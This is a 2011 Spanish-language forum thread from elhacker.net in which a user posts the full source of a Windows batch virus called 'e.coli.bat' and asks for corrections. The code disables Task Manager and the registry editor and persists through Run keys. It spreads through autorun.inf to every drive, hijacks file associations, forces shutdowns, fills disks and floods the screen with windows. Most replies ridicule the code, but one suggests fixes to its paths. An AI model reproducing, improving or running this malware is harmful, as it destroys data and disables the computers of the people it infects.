Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: W4rR3d en 12 Junio 2011, 17:44 pm


Título: virus informatico llamado e.coli.bat
Publicado por: W4rR3d en 12 Junio 2011, 17:44 pm
sin ven errores en mi codigo por favor notificar

su amigo by hackerd W4rR3d

Código
  1. @echo off
  2. ::by hacked W4rR3d
  3. ::Comunidad Informatica Black Eye Security Team
  4. :: Piura - Perù
  5. Set ecoli=echo
  6. Set HC= C:\
  7. Set HD= D:\
  8. Set HE= E:\
  9. Set HF= F:\
  10. Set HG= G:\
  11. Set HH=copy /y %0
  12. taskkill  /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
  13. tskkill  /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
  14. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
  15. REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f 
  16. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  17. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  18. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  19. if exist C:\ goto C1
  20. if not exist "C:\"goto t1
  21. :C1
  22. if exist C:\e.coli.bat attrib +h +s +r C:\e.coli.bat&attrib +h +s +r C:\autorun.inf
  23. copy /y %0 C:\e.coli.bat
  24. %ecoli% [autorun] >>C:\autorun.inf
  25. %ecoli% OPEN=e.coli.bat >>C:\autorun.inf
  26. %ecoli% shell\open\Command=e.coli.bat >>C:\autorun.inf
  27. %ecoli% shell\open\Default=1 >>C:\autorun.inf
  28. %ecoli% shell\explore\Command=e.coli.bat >>C:\autorun.inf
  29. attrib +h +s +r C:\e.coli.bat
  30. attrib +h +s +r C:\autorun.inf
  31. :t1
  32. if exist D:\ goto D1
  33. if not exist "D:\"goto t2
  34. :D1
  35. if exist D:\e.coli.bat attrib +h +s +r D:\e.coli.bat&attrib +h +s +r D:\autorun.inf
  36. copy /y %0 D:\e.coli.bat
  37. %ecoli% [autorun] >>D:\autorun.inf
  38. %ecoli% OPEN=e.coli.bat >>D:\autorun.inf
  39. %ecoli% shell\open\Command=e.coli.bat >>D:\autorun.inf
  40. %ecoli% shell\open\Default=1 >>D:\autorun.inf
  41. %ecoli% shell\explore\Command=e.coli.bat >>D:\autorun.inf
  42. attrib +h +s +r D:\e.coli.bat
  43. attrib +h +s +r D:\autorun.inf
  44. :t2
  45. if exist E:\ goto E1
  46. if not exist "E:\"goto t3
  47. :E1
  48. if exist E:\e.coli.bat attrib +h +s +r E:\e.coli.bat&attrib +h +s +r E:\autorun.inf
  49. copy /y %0 E:\e.coli.bat
  50. %ecoli% [autorun] >>E:\autorun.inf
  51. %ecoli% OPEN=e.coli.bat >>E:\autorun.inf
  52. %ecoli% shell\open\Command=e.coli.bat >>E:\autorun.inf
  53. %ecoli% shell\open\Default=1 >>E:\autorun.inf
  54. %ecoli% shell\explore\Command=e.coli.bat >>E:\autorun.inf
  55. attrib +h +s +r E:\e.coli.bat
  56. attrib +h +s +r E:\autorun.inf
  57. :T3
  58. if exist F:\ goto F1
  59. if not exist "F:\"goto t4
  60. :F1
  61. if exist F:\e.coli.bat attrib +h +s +r F:\e.coli.bat&attrib +h +s +r F:\autorun.inf
  62. copy /y %0 F:\e.coli.bat
  63. %ecoli% [autorun] >>F:\autorun.inf
  64. %ecoli% OPEN=e.coli.bat >>F:\autorun.inf
  65. %ecoli% shell\open\Command=e.coli.bat >>F:\autorun.inf
  66. %ecoli% shell\open\Default=1 >>F:\autorun.inf
  67. %ecoli% shell\explore\Command=e.coli.bat >>F:\autorun.inf
  68. attrib +h +s +r F:\e.coli.bat
  69. attrib +h +s +r F:\autorun.inf
  70. :T4
  71. if exist G:\ goto G1
  72. if not exist "G:\"goto open
  73. :G1
  74. if exist G:\e.coli.bat attrib +h +s +r G:\e.coli.bat&attrib +h +s +r G:\autorun.inf
  75. copy /y %0 G:\e.coli.bat
  76. %ecoli% [autorun] >>G:\autorun.inf
  77. %ecoli% OPEN=e.coli.bat >>G:\autorun.inf
  78. %ecoli% shell\open\Command=e.coli.bat >>G:\autorun.inf
  79. %ecoli% shell\open\Default=1 >>G:\autorun.inf
  80. %ecoli% shell\explore\Command=e.coli.bat >>G:\autorun.inf
  81. attrib +h +s +r G:\e.coli.bat
  82. attrib +h +s +r G:\autorun.inf
  83. :open
  84. if exist %HC%open.vbs goto cop
  85. %ecoli%On Error Resume Next >> %HC%open.vbs
  86. %ecoli%Set oWMP = CreateObject("WMPlayer.OCX.7")>> %HC%open.vbs
  87. %ecoli%Set colCDROMs = oWMP.cdromCollection>> %HC%open.vbs
  88. %ecoli%do>> %HC%open.vbs
  89. %ecoli%if colCDROMs.Count >= 1 then>> %HC%open.vbs
  90. %ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
  91. %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
  92. %ecoli%Next>> %HC%open.vbs
  93. %ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
  94. %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
  95. %ecoli%Next>> %HC%open.vbs
  96. %ecoli%End If>> %HC%open.vbs
  97. %ecoli%wscript.sleep 5000>> %HC%open.vbs
  98. %ecoli%loop >> %HC%open.vbs
  99. start  %HC%open.vbs
  100. :cop
  101. if exist %HC%\apgar.vbs goto reini
  102. %HH% "%appdata%\e.coli_a.exe"
  103. %HH% "%windir%\e.coli_b.exe"
  104. %HH% "%systemroot%\system32\e.coli_c.exe"
  105. %HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
  106. %HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
  107. %HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
  108. %HH% "%programfiles%\Winamp\e.coli_f.exe"
  109. %HH% "%programfiles%\WinRAR\e.coli_g.exe"
  110. %HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
  111. %HH% "%programfiles%\shARES\e.coli_i.exe"
  112. %HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
  113. %HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
  114. %HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
  115. %HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
  116. %HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
  117. :reini
  118. if exist %HC%\Warning.vbs goto war
  119. %ecoli% On Error Resume Next >> %HC%\apgar.vbs
  120. %ecoli% set shell = CreateObject("WScript.Shell") >> %HC%\apgar.vbs
  121. %ecoli% shell.run "shutdown.exe -s -f -t 7 " >> %HC%\apgar.vbs
  122. start  %HC%\apgar.vbs
  123. :war
  124. if exist %HC%\cmds.bat goto cmds
  125. echo msn=msgbox("Warning Warning Warning",16," no me puedes vencer") >> %HC%\Warning.vbs
  126. For /L %%a IN (0,1,1000) DO  start %HC%\Warning.vbs
  127. :cmds
  128. if exist %windir%e.coli.bat goto wi
  129. :wi
  130. for %%A in (C,D,E,F,G,H,I,J,K,L,M,N,Ñ,O,P,Q,R,S,T,U,V,W,X,Y,Z) do if exist "%%A:\" copy /y %0 "%%A:\INFECTED!!!"
  131. for %%E in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink,html) do assoc .%%E=batfile
  132. for %%I in (bmp.exe,gif.exe,doc.exe,mpeg.exe,xlsx.exe,avi.exe,mpg.exe,mp3.exe,mp4.exe,rar.exe,zip.exe,ink.exe,html.exe,winlogon.exe,winupdate.exe,winservice.exe,TASKMAN.exe,jpg.exe) do copy /y %0 "%windir%\%%I"
  133. attrib +h %windir%
  134. for %%p in (WINWORD.exe,EXCEL.exe,POWERPNT.exe,Winrar.exe,firefox.exe,iexplore.exe,wmplayer.exe,Ares.exe,msnmsgr.exe) do tasklist /m | find /i "%%p" && taskkill /f /im %%p.exe
  135. echo fsutil file createnew %random%.exe 4000000000>>%windir%\fsutil.exe
  136. start %windir%\fsutil.exe
  137. if exist "%windir%\jpg.exe" (goto ves) else (goto Full Disk)
  138. copy /y %0 "%windir%\jpg.exe"
  139. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%windir%\jpg.exe"" /f
  140. :ves
  141. echo 00000000  000      000 0000000000 0000000000 0000000000 00000000000 0000000000 000000>>%userprofile%\Desktop\I.txt
  142. echo 00000000  0000     000 0000000000 0000000000 0000000000 00000000000 0000000000 00000000>>%userprofile%\Desktop\N.txt
  143. echo   0000    00000    000 000        000        000            000     000        000  0000>>%userprofile%\Desktop\F.txt
  144. echo   0000    000000   000 000        000        000            000     000        000   000>>%userprofile%\Desktop\E.txt
  145. echo   0000    000 000  000 0000000000 0000000000 000            000     0000000000 000   000>>%userprofile%\Desktop\C.txt
  146. echo   0000    000  000 000 0000000000 0000000000 000            000     0000000000 000   000>>%userprofile%\Desktop\T.txt
  147. echo   0000    000   000000 000        000        000            000     000        000   000>>%userprofile%\Desktop\E.txt
  148. echo   0000    000    00000 000        000        000            000     000        000  0000>>%userprofile%\Desktop\D.txt
  149. echo 00000000  000     0000 000        0000000000 0000000000     000     0000000000 00000000>>%userprofile%\Desktop\!.txt
  150. echo 00000000  000      000 000        0000000000 0000000000     000     0000000000 000000>>%userprofile%\Desktop\!!.txt
  151. :Full Disk
  152. fsutil file createnew INFECTED!!!.exe 40000000000
  153. for %%t in (1,1,24) do at %%t /interactive /every:L,M,Mi,J,V,S,D fsutil file createnew %random%.exe 4000000000
  154. for /l %%e in (0,1,5000) do (start cmd)
  155. cls &exit
  156.  

Título: Re: virus informatico llamado e.coli.bat
Publicado por: SuperDraco en 12 Junio 2011, 17:48 pm
Set ecoli=echo



Por dios........................

Título: Re: virus informatico llamado e.coli.bat
Publicado por: FranciskoAsdf en 12 Junio 2011, 17:50 pm
Lo mismo de siempre.

Título: Re: virus informatico llamado e.coli.bat
Publicado por: bITEBUG en 15 Junio 2011, 05:36 am
Que maldad por favor!

Título: Re: virus informatico llamado e.coli.bat
Publicado por: MrSilver en 17 Junio 2011, 14:50 pm
Saludos:

No estoy muy puesto en codigo¿me podeis decir que hace exactamente el virus?

Título: Re: virus informatico llamado e.coli.bat
Publicado por: WaAYa HaCK en 17 Junio 2011, 17:41 pm
Cita de: pitoloko en 12 Junio 2011, 17:48 pm
Set ecoli=echo



Por dios........................

Pero... para qué cojones sirve esto???? Si es más fácil escribir echo !
Demonios... pero si ahora casi todos los AV detectan los Autorun!

Título: Re: virus informatico llamado e.coli.bat
Publicado por: ShotgunLogic en 17 Junio 2011, 17:51 pm
Esto pasa por meterse tanto pepino...XD

Título: Re: virus informatico llamado e.coli.bat
Publicado por: Di~OsK en 17 Junio 2011, 18:24 pm
-10

Título: Re: virus informatico llamado e.coli.bat
Publicado por: Flamer en 17 Junio 2011, 18:47 pm
Código:
%HH% "%windir%\e.coli_b.exe"
%HH% "%systemroot%\system32\e.coli_c.exe"
%HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
%HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
%HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
%HH% "%programfiles%\Winamp\e.coli_f.exe"
%HH% "%programfiles%\WinRAR\e.coli_g.exe"
%HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
%HH% "%programfiles%\shARES\e.coli_i.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
%HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
hola si no tienes privilegios de administrador esto no te funciona
ni esto
Código:
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
y pienso que esta linea te marcaria error
Código:
%HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
lo tendrias que poner asi
Código:
%HH% "%userprofile%\Mis documentos\e.coli_n.exe"
y ejecutarlo en la unidad %systemdrive% que porlo general es la unidad c:

Título: Re: virus informatico llamado e.coli.bat
Publicado por: SuperDraco en 17 Junio 2011, 20:28 pm
no se porque le ayudais, si este tipo nunca corrije nada, antes de pararse a corregir un batch, ya está haciendo otro batch con más errores que el anterior.

Como ya han dicho, lo mismo de siempre...

Por cierto, la mitad del código se puede reducir a un FOR para buscar unidades.

Saludos


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines